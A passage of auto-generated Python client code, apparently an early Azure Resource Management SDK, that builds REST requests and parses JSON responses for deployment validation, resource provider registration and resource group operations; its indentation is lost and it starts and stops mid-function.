resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value2 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value2
dependencies_array = properties_value.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value3 = depends_on_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
basic_dependency_instance.id = id_instance3
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value4 = dependencies_value.get('id', None)
if id_value4 is not None:
id_instance4 = id_value4
dependency_instance.id = id_instance4
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value = properties_value.get('templateLink', None)
if template_link_value is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value = properties_value.get('parametersLink', None)
if parameters_link_value is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def validate(self, resource_group_name, deployment_name, parameters):
"""
Validate a deployment template.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
deployment_name (string): The name of the deployment.
parameters (Deployment): Deployment to validate.
Returns:
DeploymentValidateResponse: Information from validate template
deployment response.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if deployment_name is None:
raise ValueError('deployment_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.properties is not None:
if parameters.properties.parameters_link is not None:
if parameters.properties.parameters_link.uri is None:
raise ValueError('parameters.properties.parameters_link.uri cannot be None.')
if parameters.properties.template_link is not None:
if parameters.properties.template_link.uri is None:
raise ValueError('parameters.properties.template_link.uri cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/deployments/'
url = url + quote(deployment_name)
url = url + '/validate'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
deployment_value = {}
request_doc = deployment_value
if parameters.properties is not None:
properties_value = {}
deployment_value['properties'] = properties_value
if parameters.properties.template is not None:
properties_value['template'] = json.loads(parameters.properties.template)
if parameters.properties.template_link is not None:
template_link_value = {}
properties_value['templateLink'] = template_link_value
template_link_value['uri'] = parameters.properties.template_link.uri
if parameters.properties.template_link.content_version is not None:
template_link_value['contentVersion'] = parameters.properties.template_link.content_version
if parameters.properties.parameters is not None:
properties_value['parameters'] = json.loads(parameters.properties.parameters)
if parameters.properties.parameters_link is not None:
parameters_link_value = {}
properties_value['parametersLink'] = parameters_link_value
parameters_link_value['uri'] = parameters.properties.parameters_link.uri
if parameters.properties.parameters_link.content_version is not None:
parameters_link_value['contentVersion'] = parameters.properties.parameters_link.content_version
if parameters.properties.mode is not None:
properties_value['mode'] = str(parameters.properties.mode) if parameters.properties.mode is not None else 'Incremental'
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 400:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 400:
response_content = body
result = DeploymentValidateResponse()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
error_value = response_doc.get('error', None)
if error_value is not None:
error_instance = ResourceManagementErrorWithDetails(details=[])
result.error = error_instance
details_array = error_value.get('details', None)
if details_array is not None:
for details_value in details_array:
resource_management_error_instance = ResourceManagementError()
error_instance.details.append(resource_management_error_instance)
code_value = details_value.get('code', None)
if code_value is not None:
code_instance = code_value
resource_management_error_instance.code = code_instance
message_value = details_value.get('message', None)
if message_value is not None:
message_instance = message_value
resource_management_error_instance.message = message_instance
target_value = details_value.get('target', None)
if target_value is not None:
target_instance = target_value
resource_management_error_instance.target = target_instance
code_value2 = error_value.get('code', None)
if code_value2 is not None:
code_instance2 = code_value2
error_instance.code = code_instance2
message_value2 = error_value.get('message', None)
if message_value2 is not None:
message_instance2 = message_value2
error_instance.message = message_instance2
target_value2 = error_value.get('target', None)
if target_value2 is not None:
target_instance2 = target_value2
error_instance.target = target_instance2
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = DeploymentPropertiesExtended(dependencies=[], providers=[])
result.properties = properties_instance
provisioning_state_value = properties_value2.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
properties_instance.provisioning_state = provisioning_state_instance
correlation_id_value = properties_value2.get('correlationId', None)
if correlation_id_value is not None:
correlation_id_instance = correlation_id_value
properties_instance.correlation_id = correlation_id_instance
timestamp_value = properties_value2.get('timestamp', None)
if timestamp_value is not None:
timestamp_instance = timestamp_value
properties_instance.timestamp = timestamp_instance
outputs_value = properties_value2.get('outputs', None)
if outputs_value is not None:
outputs_instance = json.dumps(outputs_value)
properties_instance.outputs = outputs_instance
providers_array = properties_value2.get('providers', None)
if providers_array is not None:
for providers_value in providers_array:
provider_instance = Provider(resource_types=[])
properties_instance.providers.append(provider_instance)
id_value = providers_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = providers_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = providers_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = providers_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value3 = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value3
dependencies_array = properties_value2.get('dependencies', None)
if dependencies_array is not None:
for dependencies_value in dependencies_array:
dependency_instance = Dependency(depends_on=[])
properties_instance.dependencies.append(dependency_instance)
depends_on_array = dependencies_value.get('dependsOn', None)
if depends_on_array is not None:
for depends_on_value in depends_on_array:
basic_dependency_instance = BasicDependency()
dependency_instance.depends_on.append(basic_dependency_instance)
id_value2 = depends_on_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
basic_dependency_instance.id = id_instance2
resource_type_value2 = depends_on_value.get('resourceType', None)
if resource_type_value2 is not None:
resource_type_instance2 = resource_type_value2
basic_dependency_instance.resource_type = resource_type_instance2
resource_name_value = depends_on_value.get('resourceName', None)
if resource_name_value is not None:
resource_name_instance = resource_name_value
basic_dependency_instance.resource_name = resource_name_instance
id_value3 = dependencies_value.get('id', None)
if id_value3 is not None:
id_instance3 = id_value3
dependency_instance.id = id_instance3
resource_type_value3 = dependencies_value.get('resourceType', None)
if resource_type_value3 is not None:
resource_type_instance3 = resource_type_value3
dependency_instance.resource_type = resource_type_instance3
resource_name_value2 = dependencies_value.get('resourceName', None)
if resource_name_value2 is not None:
resource_name_instance2 = resource_name_value2
dependency_instance.resource_name = resource_name_instance2
template_value = properties_value2.get('template', None)
if template_value is not None:
template_instance = json.dumps(template_value)
properties_instance.template = template_instance
template_link_value2 = properties_value2.get('templateLink', None)
if template_link_value2 is not None:
template_link_instance = TemplateLink()
properties_instance.template_link = template_link_instance
uri_value = template_link_value2.get('uri', None)
if uri_value is not None:
uri_instance = uri_value
template_link_instance.uri = uri_instance
content_version_value = template_link_value2.get('contentVersion', None)
if content_version_value is not None:
content_version_instance = content_version_value
template_link_instance.content_version = content_version_instance
parameters_value = properties_value2.get('parameters', None)
if parameters_value is not None:
parameters_instance = json.dumps(parameters_value)
properties_instance.parameters = parameters_instance
parameters_link_value2 = properties_value2.get('parametersLink', None)
if parameters_link_value2 is not None:
parameters_link_instance = ParametersLink()
properties_instance.parameters_link = parameters_link_instance
uri_value2 = parameters_link_value2.get('uri', None)
if uri_value2 is not None:
uri_instance2 = uri_value2
parameters_link_instance.uri = uri_instance2
content_version_value2 = parameters_link_value2.get('contentVersion', None)
if content_version_value2 is not None:
content_version_instance2 = content_version_value2
parameters_link_instance.content_version = content_version_instance2
mode_value = properties_value2.get('mode', None)
if mode_value is not None:
mode_instance = mode_value
properties_instance.mode = mode_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 200:
result.is_valid = True
return result
class ProviderOperations(object):
"""
Operations for managing providers.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def get(self, resource_provider_namespace):
"""
Gets a resource provider.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderGetResult: Resource provider information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self, parameters):
"""
Gets a list of resource providers.
Args:
parameters (ProviderListParameters): Query parameters. If null is
passed returns all deployments.
Returns:
ProviderListResult: List of resource providers.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers'
query_parameters = []
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderListResult(providers=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
provider_instance = Provider(resource_types=[])
result.providers.append(provider_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = value_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = value_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = value_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of deployments.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
ProviderListResult: List of resource providers.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderListResult(providers=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
provider_instance = Provider(resource_types=[])
result.providers.append(provider_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = value_value.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = value_value.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = value_value.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def register(self, resource_provider_namespace):
"""
Registers provider to be used with a subscription.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderRegistionResult: Resource provider registration information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
url = url + '/register'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderRegistionResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def unregister(self, resource_provider_namespace):
"""
Unregisters provider from a subscription.
Args:
resource_provider_namespace (string): Namespace of the resource
provider.
Returns:
ProviderUnregistionResult: Resource provider registration information.
"""
# Validate
if resource_provider_namespace is None:
raise ValueError('resource_provider_namespace cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/providers/'
url = url + quote(resource_provider_namespace)
url = url + '/unregister'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ProviderUnregistionResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
provider_instance = Provider(resource_types=[])
result.provider = provider_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
provider_instance.id = id_instance
namespace_value = response_doc.get('namespace', None)
if namespace_value is not None:
namespace_instance = namespace_value
provider_instance.namespace = namespace_instance
registration_state_value = response_doc.get('registrationState', None)
if registration_state_value is not None:
registration_state_instance = registration_state_value
provider_instance.registration_state = registration_state_instance
resource_types_array = response_doc.get('resourceTypes', None)
if resource_types_array is not None:
for resource_types_value in resource_types_array:
provider_resource_type_instance = ProviderResourceType(api_versions=[], locations=[], properties={})
provider_instance.resource_types.append(provider_resource_type_instance)
resource_type_value = resource_types_value.get('resourceType', None)
if resource_type_value is not None:
resource_type_instance = resource_type_value
provider_resource_type_instance.name = resource_type_instance
locations_array = resource_types_value.get('locations', None)
if locations_array is not None:
for locations_value in locations_array:
provider_resource_type_instance.locations.append(locations_value)
api_versions_array = resource_types_value.get('apiVersions', None)
if api_versions_array is not None:
for api_versions_value in api_versions_array:
provider_resource_type_instance.api_versions.append(api_versions_value)
properties_sequence_element = resource_types_value.get('properties', None)
if properties_sequence_element is not None:
for property in properties_sequence_element:
properties_key = property
properties_value = properties_sequence_element[property]
provider_resource_type_instance.properties[properties_key] = properties_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class ResourceGroupOperations(object):
"""
Operations for managing resource groups.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def begin_deleting(self, resource_group_name):
"""
Begin deleting resource group.To determine whether the operation has
finished processing the request, call GetLongRunningOperationStatus.
Args:
resource_group_name (string): The name of the resource group to be
deleted. The name is case insensitive.
Returns:
LongRunningOperationResponse: A standard service response for long
running operations.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 202:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = LongRunningOperationResponse()
result.status_code = status_code
result.operation_status_link = response.headers.get('location')
result.retry_after = int(response.headers.get('retry-after', '0'))
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 409:
result.status = OperationStatus.Failed
if status_code == 200:
result.status = OperationStatus.Succeeded
return result
def check_existence(self, resource_group_name):
"""
Checks whether resource group exists.
Args:
resource_group_name (string): The name of the resource group to check.
The name is case insensitive.
Returns:
ResourceGroupExistsResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
# Tracing
# Construct URL
url = ''
url = url + 'subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'HEAD'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 204 and status_code != 404:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = ResourceGroupExistsResult()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
if status_code == 204:
result.exists = True
return result
def create_or_update(self, resource_group_name, parameters):
"""
Create a resource group.
Args:
resource_group_name (string): The name of the resource group to be
created or updated.
parameters (ResourceGroup): Parameters supplied to the create or
update resource group service operation.
Returns:
ResourceGroupCreateOrUpdateResult: Resource group information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if resource_group_name is not None and len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if (re.search('^[-\\w\\._]+$', resource_group_name) is not None) == False:
raise IndexError('resource_group_name is outside the valid range.')
if parameters is None:
raise ValueError('parameters cannot be None.')
if parameters.location is None:
raise ValueError('parameters.location cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
query_parameters = []
